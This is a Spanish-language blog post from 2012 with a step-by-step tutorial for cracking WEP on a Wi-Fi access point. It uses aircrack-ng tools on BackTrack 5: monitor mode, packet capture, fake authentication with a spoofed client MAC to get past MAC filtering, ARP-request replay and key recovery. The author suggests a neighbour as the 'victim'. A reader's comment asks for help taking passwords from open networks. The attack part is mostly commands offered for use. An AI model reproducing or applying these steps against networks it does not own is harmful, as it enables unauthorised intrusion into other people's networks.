martes, 3 de julio de 2012

HACKEAR RED WEB WIFI OPEN SYSTEM

Hola mis amados lectores, ahora veremos un poco sobre seguridad en redes inalambrícas, algo muy de moda ahora en las empresas, casa y/o universidad, en nuestro trabajo contamos con diferentes tipos de red desde opensystem/wep con un portal de autentificación, no he encontrado ninguna con wpa2 y menos con servidor radius,openldap.

Ahora nuestro plan de ataque sera monitorear una red de nuestro alrededor XD, algún vecino que deberá ser nuestra victima o sin dudas un AP prueba. Por ejemplo yo cuento con un AP 2100 Dlink, si ven la gráfica he configurado el equipo de la siguiente forma:

Name_ESSID CampusPre Nombre del Ap que se publicara en la red
Autentificación OpenSystem
EncryptionSe habilitad el cifrado de datos
key TypeTipo de contraseña ASCII/HEX
First keyPrimera contraseña Valida, Puedes ingresar hasta 4

Escalamos otro nivel de seguridad más xD registrando solo nuestra MAC del dispositivo estación que va a navegar a través de este AP.

Por razones que esta de más explicar no dare la MAC de mi cliente ya que muxos en mi trabajo harían pruebas no deseadas por mi XD

Una vez recogido todos estos datos que hacemos:

Bueno tener nuestra laptop+una antena( no necesario, siempre y cuando bootees desde un cd en mi caso use la distro Bartrack5.0)
posdata:Si deseas ahorrarte usar comandos para el proceso que ojo es mucha más lento, porque en mi caso tuve la manía de averiguar para que sirve cada comando y su metodo de ataque, te recomiendo usar Beini te ahorraras todo ese rollo, una distro mucho más sencilla y rapida.

Usando Backtrack 5.0: Procedimiento:
1) Colocar tu tarjeta de red en modo monitor puedes hacerlo de dos formas: a) Colocamos la opción canal para que solo se monitorice un solo canal en el cual este enviando los paquetes.
root@localhost# airmon-ng start wlan0 [canal]  
b)
root@localhost# ifconfig wlan0 mode monitor 
2) Observar las redes activas para obtener el bssid y el mac del cliente:
root@localhost# airodump-ng wlan0 
3) Obtuvimos la dirección AP, la MAC del cliente asociada y canal sobre el cual trabaja.
root@localhost# airdump-ng -c [canal] -b [MAC_AP] -w [ruta_archivo_cap] mon0 
4) En nuestro caso/ejemplo la persona que coloco la contraseña WEB fue mas precavida y limito la conexión a través del AP a una sola MAC en mi caso conocida como MAC_CLIENTE. Suponiendo que yo desconosco si existe una restricción, puedo realizar una pequeña autentificación al AP, esto se llama falsa autentificación.
root@localhost# aireplay-ng -1 0 -a [MAC_AP] -h [MAC_FALSA] mon0 
Si sale error significa que esta registrada por MAC en ese caso con airodump ya sacamos la MAC de nuestro cliente.
root@localhost# aireplay-ng -1 0 -a [MAC_AP] -h [MAC_CLIENTE] mon0 
ok ... XD
5)Enviamos solicitud de paquete arq requests para que en cada solicitud el AP nos envie VI(vector de inicialización), en donde se almacena la contraseña WEB
root@localhost# aireplay-ng -3 -b [MAC_AP] -h [MAC_CLIENTE] mon0 
6)Capturamos la contraseña con aircrack, usamos un archivo.cap generado a la hora de ejecutar el comando airodump-ng xD
root@localhost# aircrack-ng -0 -b [MAC_AP] [ARCHIVO.cap]
Observación: En este caso puedes agregar -b 64 para una encriptación de 64 bits, en modo ASCII 5 caracteres. Gracias

1 comentario:

Evolution Art dijo...

Hola, ya tengo la mac client, yo uso beini pero quisiera saber cual seria el procedimiento para obtener la contraseña, soy nuevo usando este programa y hace poco estuve en un lugar donde todas las señales eran opn y tuve mucha curiosidad.

 
;